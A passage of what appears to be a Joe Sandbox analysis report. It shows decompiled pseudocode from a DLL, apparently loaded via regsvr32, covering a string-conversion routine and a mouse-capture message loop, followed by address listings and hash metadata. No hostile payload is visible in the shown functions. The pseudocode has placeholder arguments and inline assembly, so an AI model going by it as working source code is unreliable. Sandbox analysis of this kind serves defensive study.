							_t188 =  *((intOrPtr*)(_t167 + 0x48));
							goto L16;
						} else {
							E1003D060(_t129, _t144, _t147, _t155, _t157, _t163, _t165, _t168, _t176);
							_t145 = _t129;
							_t188 =  *((intOrPtr*)(_t129 + 0xc0));
							_t161 =  *((intOrPtr*)(_t129 + 0xb8));
							__eflags = _t188 -  *0x100703d0; // 0x10070270
							if(__eflags != 0) {
								_t114 =  *(_t129 + 0xc8);
								__eflags =  *0x10070258 & _t114;
								if(( *0x10070258 & _t114) == 0) {
									E10047EE0(_t117, _t129, _t147, _t155, _t168, _t176);
									_t188 = _t129;
								}
							}
							__eflags = _t161 -  *0x10070150; // 0x23a5c20
							if(__eflags != 0) {
								_t112 =  *(_t145 + 0xc8);
								__eflags =  *0x10070258 & _t112;
								if(( *0x10070258 & _t112) == 0) {
									E10047300(_t117, _t129, _t145, _t147, _t155, _t161, _t163, _t165, _t176);
								}
							}
							_t117 =  *(_t145 + 0xc8);
							__eflags = _t117 & 0x00000002;
							if((_t117 & 0x00000002) == 0) {
								_t117 = _t117 | 0x00000002;
								r13b = 1;
								 *(_t145 + 0xc8) = _t117;
							}
							L16:
							__eflags = _t185;
							if(_t185 == 0) {
								__eflags =  *(_t188 + 0x14);
								if( *(_t188 + 0x14) != 0) {
									_t117 =  *(_t188 + 4);
									_t133 = _t167 + 0x40;
									r9d = 0xffffffff;
									 *((long long*)(_t167 + 0x38)) = _t133;
									 *((long long*)(_t167 + 0x30)) = _t165;
									 *(_t167 + 0x28) = 0;
									 *((long long*)(_t167 + 0x20)) = _t165;
									WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
									__eflags = _t133;
									if(_t133 == 0) {
										L67:
										E1003AF40(_t133);
										__eflags = r13b;
										 *_t133 = 0x2a;
										L68:
										if(__eflags != 0) {
											_t83 = _t145 + 0xc8;
											 *_t83 =  *(_t145 + 0xc8) & 0xfffffffd;
											__eflags =  *_t83;
										}
										L71:
										goto L72;
									}
									__eflags =  *(_t167 + 0x40);
									if( *(_t167 + 0x40) != 0) {
										goto L67;
									}
									__eflags = _t133 + 0xffffffff;
									L65:
									__eflags = r13b;
									if(r13b != 0) {
										 *(_t145 + 0xc8) =  *(_t145 + 0xc8) & 0xfffffffd;
									}
									goto L71;
								}
								asm("repne scasw");
								__eflags = r13b;
								if(r13b != 0) {
									_t71 = _t145 + 0xc8;
									 *_t71 =  *(_t145 + 0xc8) & 0xfffffffd;
									__eflags =  *_t71;
								}
								goto L71;
							}
							__eflags =  *(_t188 + 0x14);
							if( *(_t188 + 0x14) != 0) {
								__eflags =  *(_t188 + 0x10c) - 1;
								if( *(_t188 + 0x10c) != 1) {
									_t117 =  *(_t188 + 4);
									_t132 = _t167 + 0x40;
									r9d = 0xffffffff;
									 *((long long*)(_t167 + 0x38)) = _t132;
									 *((long long*)(_t167 + 0x30)) = _t165;
									 *(_t167 + 0x28) = r12d;
									 *((long long*)(_t167 + 0x20)) = _t185;
									_t101 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
									__eflags = _t101;
									_t160 = _t101;
									if(_t101 == 0) {
										__eflags =  *(_t167 + 0x40);
										if( *(_t167 + 0x40) != 0) {
											L57:
											E1003AF40(_t132);
											__eflags = r13b;
											 *_t132 = 0x2a;
											goto L68;
										}
										_t103 = GetLastError();
										__eflags = _t103 - 0x7a;
										if(_t103 != 0x7a) {
											goto L57;
										}
										__eflags = _t160 - _t176;
										if(_t160 >= _t176) {
											L54:
											__eflags = r13b;
											if(r13b != 0) {
												_t68 = _t145 + 0xc8;
												 *_t68 =  *(_t145 + 0xc8) & 0xfffffffd;
												__eflags =  *_t68;
											}
											goto L71;
										}
										while(1) {
											_t117 =  *(_t188 + 4);
											r9d = 1;
											 *((long long*)(_t167 + 0x38)) = _t167 + 0x40;
											 *((long long*)(_t167 + 0x30)) = _t165;
											 *(_t167 + 0x28) =  *(_t188 + 0x10c);
											_t132 = _t167 + 0x68;
											 *((long long*)(_t167 + 0x20)) = _t132;
											_t105 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
											__eflags = _t105;
											if(_t105 == 0) {
												goto L57;
											}
											__eflags =  *(_t167 + 0x40);
											if( *(_t167 + 0x40) != 0) {
												goto L57;
											}
											__eflags = _t105;
											if(_t105 < 0) {
												goto L57;
											}
											__eflags = _t105 - 5;
											if(_t105 > 5) {
												goto L57;
											}
											_t156 = _t105;
											__eflags = _t156 + _t160 - _t176;
											if(_t156 + _t160 > _t176) {
												goto L54;
											}
											__eflags = _t156;
											_t153 = _t165;
											if(_t156 <= 0) {
												L53:
												_t163 =  &(_t163[2]);
												__eflags = _t160 - _t176;
												if(_t160 < _t176) {
													continue;
												}
												goto L54;
											} else {
												goto L51;
											}
											while(1) {
												L51:
												_t106 =  *(_t167 + _t153 + 0x68) & 0x000000ff;
												__eflags = _t106;
												 *(_t185 + _t160) = _t106;
												if(_t106 == 0) {
													goto L54;
												}
												_t153 = _t153 + 1;
												_t160 = _t160 + 1;
												__eflags = _t153 - _t156;
												if(_t153 < _t156) {
													continue;
												}
												goto L53;
											}
											goto L54;
										}
										goto L57;
									}
									__eflags =  *(_t167 + 0x40);
									if( *(_t167 + 0x40) != 0) {
										goto L57;
									}
									goto L65;
								}
								__eflags = _t176;
								if(_t176 == 0) {
									L34:
									_t117 =  *(_t188 + 4);
									_t132 = _t167 + 0x40;
									r9d = r12d;
									 *((long long*)(_t167 + 0x38)) = _t132;
									 *((long long*)(_t167 + 0x30)) = _t165;
									 *(_t167 + 0x28) = r12d;
									 *((long long*)(_t167 + 0x20)) = _t185;
									WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
									__eflags = _t132;
									if(_t132 == 0) {
										goto L57;
									}
									__eflags =  *(_t167 + 0x40);
									if( *(_t167 + 0x40) != 0) {
										goto L57;
									}
									__eflags =  *((intOrPtr*)(_t185 + _t132 - 1)) - bpl;
									if( *((intOrPtr*)(_t185 + _t132 - 1)) == bpl) {
									}
									goto L65;
								}
								_t142 = _t163;
								_t154 = _t176;
								while(1) {
									__eflags =  *_t142;
									if( *_t142 == 0) {
										break;
									}
									_t142 =  &(_t142[0]);
									_t154 = _t154 - 1;
									__eflags = _t154;
									if(_t154 != 0) {
										continue;
									}
									goto L34;
								}
								__eflags = _t154;
								if(_t154 != 0) {
									__eflags =  *_t142;
									if( *_t142 == 0) {
										__eflags = (_t142 - _t163 >> 1) + 1;
									}
								}
								goto L34;
							}
							__eflags = _t176;
							if(_t176 == 0) {
								L22:
								__eflags = r13b;
								if(r13b != 0) {
									_t34 = _t145 + 0xc8;
									 *_t34 =  *(_t145 + 0xc8) & 0xfffffffd;
									__eflags =  *_t34;
								}
								goto L71;
							} else {
								goto L19;
							}
							while(1) {
								L19:
								__eflags =  *_t163 - 0xff;
								if( *_t163 > 0xff) {
									goto L57;
								}
								_t109 =  *_t163 & 0x000000ff;
								_t163 =  &(_t163[2]);
								 *(_t185 + _t165) = _t109;
								__eflags =  *(_t163 - 2) & 0x0000ffff;
								if(( *(_t163 - 2) & 0x0000ffff) == 0) {
									goto L22;
								}
								_t165 = _t165 + 1;
								__eflags = _t165 - _t176;
								if(_t165 < _t176) {
									continue;
								}
								goto L22;
							}
							goto L57;
						}
					}
					L4:
					E1003AF40(_t129);
					r9d = 0;
					r8d = 0;
					_t117 = 0;
					 *((long long*)(_t167 + 0x20)) = _t165;
					 *_t129 = 0x16;
					E1003C790(_t144, _t147, _t155, _t157, _t163, _t165, _t168);
					goto L72;
				} else {
					L72:
					return E10038D20(_t117,  *(_t167 + 0x70) ^ _t167);
				}
			}





































                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a700
                                                                              0x1004a70a
                                                                              0x1004a711
                                                                              0x1004a714
                                                                              0x1004a719
                                                                              0x1004a71d
                                                                              0x1004a726
                                                                              0x1004a72a
                                                                              0x1004a72e
                                                                              0x1004a731
                                                                              0x1004a735
                                                                              0x1004a738
                                                                              0x1004a73b
                                                                              0x1004a749
                                                                              0x1004a74c
                                                                              0x1004a779
                                                                              0x1004a780
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a782
                                                                              0x1004a78a
                                                                              0x1004a792
                                                                              0x1004a79a
                                                                              0x1004a79d
                                                                              0x1004a7a0
                                                                              0x1004a7a8
                                                                              0x1004a7ad
                                                                              0x1004a81c
                                                                              0x1004a821
                                                                              0x1004a824
                                                                              0x1004a828
                                                                              0x1004a82c
                                                                              0x1004a832
                                                                              0x1004a837
                                                                              0x00000000
                                                                              0x1004a7af
                                                                              0x1004a7af
                                                                              0x1004a7b4
                                                                              0x1004a7b7
                                                                              0x1004a7be
                                                                              0x1004a7c5
                                                                              0x1004a7cc
                                                                              0x1004a7ce
                                                                              0x1004a7d4
                                                                              0x1004a7da
                                                                              0x1004a7dc
                                                                              0x1004a7e1
                                                                              0x1004a7e1
                                                                              0x1004a7da
                                                                              0x1004a7e4
                                                                              0x1004a7eb
                                                                              0x1004a7ed
                                                                              0x1004a7f3
                                                                              0x1004a7f9
                                                                              0x1004a7fb
                                                                              0x1004a7fb
                                                                              0x1004a7f9
                                                                              0x1004a800
                                                                              0x1004a806
                                                                              0x1004a809
                                                                              0x1004a80b
                                                                              0x1004a80e
                                                                              0x1004a811
                                                                              0x1004a811
                                                                              0x1004a83c
                                                                              0x1004a83c
                                                                              0x1004a83f
                                                                              0x1004aa3e
                                                                              0x1004aa42
                                                                              0x1004aa68
                                                                              0x1004aa6c
                                                                              0x1004aa71
                                                                              0x1004aa77
                                                                              0x1004aa7c
                                                                              0x1004aa86
                                                                              0x1004aa8a
                                                                              0x1004aa8f
                                                                              0x1004aa97
                                                                              0x1004aa9a
                                                                              0x1004aab4
                                                                              0x1004aab4
                                                                              0x1004aab9
                                                                              0x1004aabc
                                                                              0x1004aac2
                                                                              0x1004aac2
                                                                              0x1004aac4
                                                                              0x1004aac4
                                                                              0x1004aac4
                                                                              0x1004aac4
                                                                              0x1004aad2
                                                                              0x00000000
                                                                              0x1004aaea
                                                                              0x1004aa9c
                                                                              0x1004aaa0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004aaa2
                                                                              0x1004aaa6
                                                                              0x1004aaa6
                                                                              0x1004aaa9
                                                                              0x1004aaab
                                                                              0x1004aaab
                                                                              0x00000000
                                                                              0x1004aaa9
                                                                              0x1004aa50
                                                                              0x1004aa53
                                                                              0x1004aa59
                                                                              0x1004aa5b
                                                                              0x1004aa5b
                                                                              0x1004aa5b
                                                                              0x1004aa5b
                                                                              0x00000000
                                                                              0x1004aa62
                                                                              0x1004a845
                                                                              0x1004a849
                                                                              0x1004a88c
                                                                              0x1004a894
                                                                              0x1004a921
                                                                              0x1004a925
                                                                              0x1004a92a
                                                                              0x1004a930
                                                                              0x1004a935
                                                                              0x1004a93f
                                                                              0x1004a944
                                                                              0x1004a949
                                                                              0x1004a94f
                                                                              0x1004a951
                                                                              0x1004a954
                                                                              0x1004a969
                                                                              0x1004a96d
                                                                              0x1004aa2b
                                                                              0x1004aa2b
                                                                              0x1004aa30
                                                                              0x1004aa33
                                                                              0x00000000
                                                                              0x1004aa33
                                                                              0x1004a973
                                                                              0x1004a979
                                                                              0x1004a97c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a982
                                                                              0x1004a985
                                                                              0x1004aa17
                                                                              0x1004aa17
                                                                              0x1004aa1a
                                                                              0x1004aa1c
                                                                              0x1004aa1c
                                                                              0x1004aa1c
                                                                              0x1004aa1c
                                                                              0x00000000
                                                                              0x1004aa23
                                                                              0x1004a990
                                                                              0x1004a990
                                                                              0x1004a999
                                                                              0x1004a99f
                                                                              0x1004a9ab
                                                                              0x1004a9b0
                                                                              0x1004a9b4
                                                                              0x1004a9be
                                                                              0x1004a9c3
                                                                              0x1004a9c9
                                                                              0x1004a9cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a9cd
                                                                              0x1004a9d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a9d3
                                                                              0x1004a9d5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a9d7
                                                                              0x1004a9da
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a9dc
                                                                              0x1004a9e3
                                                                              0x1004a9e6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a9e8
                                                                              0x1004a9eb
                                                                              0x1004a9ee
                                                                              0x1004aa0a
                                                                              0x1004aa0a
                                                                              0x1004aa0e
                                                                              0x1004aa11
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a9f0
                                                                              0x1004a9f0
                                                                              0x1004a9f0
                                                                              0x1004a9f5
                                                                              0x1004a9f7
                                                                              0x1004a9fb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a9fd
                                                                              0x1004aa01
                                                                              0x1004aa05
                                                                              0x1004aa08
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004aa08
                                                                              0x00000000
                                                                              0x1004a9f0
                                                                              0x00000000
                                                                              0x1004a990
                                                                              0x1004a956
                                                                              0x1004a95a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a960
                                                                              0x1004a89a
                                                                              0x1004a89d
                                                                              0x1004a8cd
                                                                              0x1004a8cd
                                                                              0x1004a8d1
                                                                              0x1004a8d6
                                                                              0x1004a8d9
                                                                              0x1004a8de
                                                                              0x1004a8e8
                                                                              0x1004a8ed
                                                                              0x1004a8f2
                                                                              0x1004a8fa
                                                                              0x1004a8fd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a903
                                                                              0x1004a907
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a90d
                                                                              0x1004a912
                                                                              0x1004a912
                                                                              0x00000000
                                                                              0x1004a912
                                                                              0x1004a89f
                                                                              0x1004a8a2
                                                                              0x1004a8a5
                                                                              0x1004a8a5
                                                                              0x1004a8a8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a8aa
                                                                              0x1004a8ae
                                                                              0x1004a8ae
                                                                              0x1004a8b2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a8b4
                                                                              0x1004a8b6
                                                                              0x1004a8b9
                                                                              0x1004a8bb
                                                                              0x1004a8be
                                                                              0x1004a8c9
                                                                              0x1004a8c9
                                                                              0x1004a8be
                                                                              0x00000000
                                                                              0x1004a8b9
                                                                              0x1004a84b
                                                                              0x1004a84e
                                                                              0x1004a878
                                                                              0x1004a878
                                                                              0x1004a87b
                                                                              0x1004a87d
                                                                              0x1004a87d
                                                                              0x1004a87d
                                                                              0x1004a87d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a850
                                                                              0x1004a850
                                                                              0x1004a850
                                                                              0x1004a855
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a85b
                                                                              0x1004a85e
                                                                              0x1004a862
                                                                              0x1004a86a
                                                                              0x1004a86d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a86f
                                                                              0x1004a873
                                                                              0x1004a876
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004a876
                                                                              0x00000000
                                                                              0x1004a850
                                                                              0x1004a7ad
                                                                              0x1004a74e
                                                                              0x1004a74e
                                                                              0x1004a753
                                                                              0x1004a756
                                                                              0x1004a75b
                                                                              0x1004a75d
                                                                              0x1004a762
                                                                              0x1004a768
                                                                              0x00000000
                                                                              0x1004a742
                                                                              0x1004aaf2
                                                                              0x1004ab26
                                                                              0x1004ab26

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f60d30d208b8937f98b12bbec3fa1385e342e1a8550a30a0245c3f705dd9fd7
                                                                              • Instruction ID: 405421edffa6907d1a8b75b112dbc059a8eb518e17be327054d873cc282b60d8
                                                                              • Opcode Fuzzy Hash: 9f60d30d208b8937f98b12bbec3fa1385e342e1a8550a30a0245c3f705dd9fd7
                                                                              • Instruction Fuzzy Hash: F4B1C272619BC08ADB60DF11A54075A73A0F746BA8F354339DEA887794DF38C8E5CB09
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002CF30 Relevance: 7.8, APIs: 5, Instructions: 254COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E1002CF30(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, unsigned long long __rax, intOrPtr __rcx, long long __rdx, void* __rdi, void* __rsi, void* __rbp, void* __r9, void* __r12, void* __r13, void* __r14, void* __r15, signed int _a8, signed int _a12, long long _a16, intOrPtr _a20, unsigned int _a24, unsigned long long _a32) {
				intOrPtr _v20;
				signed int _v40;
				intOrPtr _v48;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char _t129;
				signed int _t137;
				intOrPtr _t141;
				signed int _t144;
				void* _t152;
				void* _t154;
				void* _t156;
				void* _t159;
				signed int _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t176;
				intOrPtr _t177;
				void* _t179;
				signed int _t184;
				signed int _t193;
				intOrPtr _t194;
				void* _t197;
				unsigned long long _t208;
				unsigned long long _t214;
				unsigned long long _t222;
				long long _t223;
				intOrPtr _t224;
				intOrPtr _t250;
				intOrPtr _t251;
				intOrPtr _t280;
				void* _t285;
				void* _t286;
				void* _t291;
				unsigned long long _t293;
				void* _t300;
				void* _t301;

				_t301 = __r15;
				_t300 = __r14;
				_t291 = __r9;
				_t260 = __rdx;
				_t207 = __rax;
				_t197 = __esi;
				_t195 = __edi;
				_t188 = __edx;
				_t180 = __ecx;
				_t179 = __ebx;
				_a16 = __rdx;
				_push(__rsi);
				_t286 = _t285 - 0x48;
				_t223 = __rdx;
				_t280 = __rcx;
				 *(__rcx + 0xa0) = 1;
				E1002C6A8(__rax, __rcx, __rdx);
				_t226 =  *((intOrPtr*)(_t280 + 0x98));
				if((E1000C248(__rax,  *((intOrPtr*)(_t280 + 0x98))) & 0x00000001) != 0) {
					__rcx =  *((intOrPtr*)(__rsi + 0x98));
					__edx = 0;
					__eflags = 0;
					__eax = E1000C298(0, __rax, __rcx);
				}
				_t129 =  *( *((intOrPtr*)(_t280 + 0x70)) + 0xdc);
				__eflags = _t129 & 0x00000004;
				if(__eflags == 0) {
					__eflags = _t129 & 0x00000002;
					if(__eflags == 0) {
						GetWindowRect();
						_t195 =  *(_t280 + 0x88) & 0x0000a000;
						 *((long long*)(_t280 + 8)) = _t223;
						r8d = 0xffffffff;
						asm("inc ebp");
						r9d = r9d & 0x00000006;
						r9d = r9d + 0xa;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x70)))) + 0x270))();
						__eflags =  *(_t280 + 0x88) & 0x0000a000;
						asm("movdqu xmm0, [esp+0x20]");
						if(__eflags == 0) {
							r8d = _v88;
							asm("movdqu [ebp], xmm0");
							_a8 = r8d;
							_v72 = r8d;
							asm("cdq");
							_t137 = _v80 - r8d - _t188 >> 1;
							_t208 = _a24;
							_a12 = _a20 - _t137;
							_t180 = _t208 + _t289;
							_t207 = _t208 >> 0x20;
							_v64 = _t180;
							_v68 = _t180;
							_v60 = _t137 + _t180;
							asm("movdqu xmm0, [esp+0x30]");
							asm("movdqu [edi], xmm0");
						} else {
							r8d = _v84;
							asm("movdqu [edi], xmm0");
							_a12 = r8d;
							asm("cdq");
							_t166 = _v76 - r8d - _t188 >> 1;
							_t184 = _t179 - _t166;
							_v72 = _t184;
							_a8 = _t184;
							_t180 = _t184 + _t166;
							_v64 = _t180;
							_t207 = _a24 >> 0x20;
							_v68 = _t180;
							_v60 = _t166 + _t180;
							asm("movdqu xmm0, [esp+0x30]");
							asm("movdqu [ebp], xmm0");
						}
						asm("movdqu xmm0, [edi]");
						asm("movdqu xmm1, [ebp]");
						asm("repe inc ecx");
						asm("repe inc ecx");
						goto L38;
					}
					GetWindowRect();
					r9d = 0xa;
					 *((long long*)(_t280 + 8)) = _t223;
					r8d = _t291 - 0xb;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x70)))) + 0x270))();
					r9d = 0x10;
					r8d = _t291 - 0x11;
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x70)))) + 0x270))();
					_t293 = _v72;
					_v88 = r11d;
					_v80 = _a8 + _t293;
					_t171 = _t170 + _t188;
					_v84 = _t188;
					_v76 = _t171;
					_t214 = _a24;
					asm("movdqu xmm0, [esp+0x20]");
					_t180 = _t214 + _t293;
					_t207 = _t214 >> 0x20;
					asm("movdqu [edi], xmm0");
					asm("repe inc ecx");
					_v88 = r11d;
					_v84 = _t188;
					_v76 = _t171 + _t188;
					_v80 = _t214 + _t293;
					asm("movdqu xmm0, [esp+0x20]");
					asm("movdqu [ebp], xmm0");
					goto L31;
				} else {
					GetWindowRect();
					 *((long long*)(_t280 + 8)) = _t223;
					r9d = 0xa;
					r8d = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x70)))) + 0x270))();
					r9d = 0x10;
					r8d = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x70)))) + 0x270))();
					r9d = 6;
					r8d = 0;
					_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x70)))) + 0x270))();
					_t293 = _v72;
					_v88 = r11d;
					_v80 = _a8 + _t293;
					_t289 = _t293 >> 0x20;
					_t177 = _t176 + r8d;
					_v84 = r8d;
					_v76 = _t177;
					asm("movdqu xmm0, [esp+0x20]");
					_v88 = r11d;
					asm("movdqu [edi], xmm0");
					_v80 = _a24 + _t293;
					_v84 = r8d;
					_v76 = _t177 + r8d;
					_t222 = _a32;
					asm("movdqu xmm0, [esp+0x20]");
					_t194 = _t222 + _t293;
					_v88 = r11d;
					asm("movdqu [ebp], xmm0");
					_v80 = _t194;
					_v84 = r8d;
					_t207 = _t222 >> 0x20;
					_t180 = _t207 + (_t293 >> 0x20);
					_v76 = _t180;
					asm("movdqu xmm0, [esp+0x20]");
					_v88 = r11d;
					_v80 = _t194;
					_v84 = r8d;
					_v76 = _t180;
					asm("repe inc ecx");
					asm("movdqu xmm0, [esp+0x20]");
					L31:
					asm("repe inc ecx");
					L38:
					r8d = 0;
					E1002BCE4();
					r8d = 0;
					E1002BCE4();
					r8d =  *0x10074c94; // 0x2
					r8d =  ~r8d;
					InflateRect(??, ??, ??);
					r8d =  *0x10074c94; // 0x2
					_t193 =  *0x10074c90; // 0x2
					r8d =  ~r8d;
					_t188 =  ~_t193;
					InflateRect(??, ??, ??);
					E1002C4F4();
					E1002C4F4();
					E1002C4F4();
					E1002C4F4();
					_t141 = E1002C338(__eflags, _t280);
					_t260 = _t223;
					 *((intOrPtr*)(_t280 + 0x84)) = _t141;
					E1002C968(_t141,  ~_t193, _t195, _t280, _t223, _t289, _t291, _t293);
					_t226 = _t280;
					_t286 = _t286 + 0x48;
					_pop(_t223);
					_push(_t223);
					_t224 = _t226;
					GetCapture();
					if(_t207 != 0) {
						L26:
						_t144 = 0;
						__eflags = 0;
						goto L27;
					} else {
						SetCapture();
						E10011808(_t179, _t188, _t207, _t207, _t260, _t289, _t291, _t293);
						while(1) {
							GetCapture();
							E10011808(_t179, _t188, _t207, _t207, _t260, _t289, _t291, _t293);
							if(_t207 !=  *((intOrPtr*)(_t224 + 0x70))) {
								break;
							}
							r9d = 0;
							r8d = 0;
							_t188 = 0;
							if(GetMessageW(??, ??, ??, ??) == 0) {
								_t180 = _v40;
								E10024D14();
								break;
							}
							_t152 = _v48 - 0x100;
							if(_t152 == 0) {
								__eflags =  *(_t224 + 0xa0);
								if( *(_t224 + 0xa0) != 0) {
									_t188 = _v40;
									r8d = 1;
									E1002CA04(_v40, _t224);
								}
								__eflags = _v40 - 0x1b;
								if(__eflags == 0) {
									break;
								} else {
									continue;
								}
							}
							_t154 = _t152 - 1;
							if(_t154 == 0) {
								__eflags =  *(_t224 + 0xa0);
								if(__eflags != 0) {
									_t188 = _v40;
									r8d = 0;
									E1002CA04(_v40, _t224);
								}
								continue;
							}
							_t156 = _t154 - 0xff;
							if(_t156 == 0) {
								__eflags =  *(_t224 + 0xa0);
								_t260 = _v20;
								_t250 = _t224;
								if( *(_t224 + 0xa0) == 0) {
									E1002CA44(_t156, 0, _t250, _t260);
								} else {
									E1002C968(_t156, 0, _t195, _t250, _t260, _t289, _t291, _t293);
								}
								continue;
							}
							_t159 = _t156 - 2;
							if(_t159 == 0) {
								__eflags =  *(_t224 + 0xa0);
								_t251 = _t224;
								if(__eflags == 0) {
									E1002CD98(_t179, _t180, 0, _t197, __eflags, _t207, _t251, _t260, _t291, _t293, _t300, _t301);
								} else {
									E1002CC78(_t179, _t180, 0, _t197, __eflags, _t207, _t251, _t260, _t291, _t293, _t300, _t301);
								}
								_t144 = 1;
								L27:
								return _t144;
							}
							if(_t159 == 2) {
								break;
							}
							DispatchMessageW();
						}
						E1002CC18(_t180, __eflags, _t207, _t224, _t260, _t293);
						goto L26;
					}
				}
			}















































                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf30
                                                                              0x1002cf37
                                                                              0x1002cf3d
                                                                              0x1002cf41
                                                                              0x1002cf44
                                                                              0x1002cf47
                                                                              0x1002cf51
                                                                              0x1002cf56
                                                                              0x1002cf64
                                                                              0x1002cf66
                                                                              0x1002cf6d
                                                                              0x1002cf6d
                                                                              0x1002cf6f
                                                                              0x1002cf6f
                                                                              0x1002cf78
                                                                              0x1002cf82
                                                                              0x1002cf84
                                                                              0x1002d0c3
                                                                              0x1002d0c5
                                                                              0x1002d19b
                                                                              0x1002d1ab
                                                                              0x1002d1b1
                                                                              0x1002d1c2
                                                                              0x1002d1ca
                                                                              0x1002d1cd
                                                                              0x1002d1d1
                                                                              0x1002d1d5
                                                                              0x1002d1dc
                                                                              0x1002d1e2
                                                                              0x1002d1ec
                                                                              0x1002d24f
                                                                              0x1002d25f
                                                                              0x1002d267
                                                                              0x1002d26f
                                                                              0x1002d274
                                                                              0x1002d277
                                                                              0x1002d27b
                                                                              0x1002d283
                                                                              0x1002d28a
                                                                              0x1002d28e
                                                                              0x1002d292
                                                                              0x1002d2a4
                                                                              0x1002d2a8
                                                                              0x1002d2ac
                                                                              0x1002d2b2
                                                                              0x1002d1ee
                                                                              0x1002d1f2
                                                                              0x1002d1f9
                                                                              0x1002d200
                                                                              0x1002d208
                                                                              0x1002d20b
                                                                              0x1002d20d
                                                                              0x1002d217
                                                                              0x1002d21b
                                                                              0x1002d222
                                                                              0x1002d224
                                                                              0x1002d230
                                                                              0x1002d23a
                                                                              0x1002d23e
                                                                              0x1002d242
                                                                              0x1002d248
                                                                              0x1002d248
                                                                              0x1002d2b6
                                                                              0x1002d2ba
                                                                              0x1002d2c7
                                                                              0x1002d2cd
                                                                              0x00000000
                                                                              0x1002d2cd
                                                                              0x1002d0d0
                                                                              0x1002d0da
                                                                              0x1002d0e0
                                                                              0x1002d0ef
                                                                              0x1002d0f3
                                                                              0x1002d0fd
                                                                              0x1002d106
                                                                              0x1002d112
                                                                              0x1002d118
                                                                              0x1002d12d
                                                                              0x1002d132
                                                                              0x1002d149
                                                                              0x1002d14b
                                                                              0x1002d14f
                                                                              0x1002d153
                                                                              0x1002d15b
                                                                              0x1002d161
                                                                              0x1002d165
                                                                              0x1002d169
                                                                              0x1002d16d
                                                                              0x1002d175
                                                                              0x1002d17a
                                                                              0x1002d17e
                                                                              0x1002d182
                                                                              0x1002d186
                                                                              0x1002d18c
                                                                              0x00000000
                                                                              0x1002cf8a
                                                                              0x1002cf8f
                                                                              0x1002cf99
                                                                              0x1002cfa8
                                                                              0x1002cfae
                                                                              0x1002cfb1
                                                                              0x1002cfc6
                                                                              0x1002cfcc
                                                                              0x1002cfcf
                                                                              0x1002cfe4
                                                                              0x1002cfea
                                                                              0x1002cfed
                                                                              0x1002cff3
                                                                              0x1002d008
                                                                              0x1002d00d
                                                                              0x1002d018
                                                                              0x1002d024
                                                                              0x1002d027
                                                                              0x1002d02c
                                                                              0x1002d038
                                                                              0x1002d042
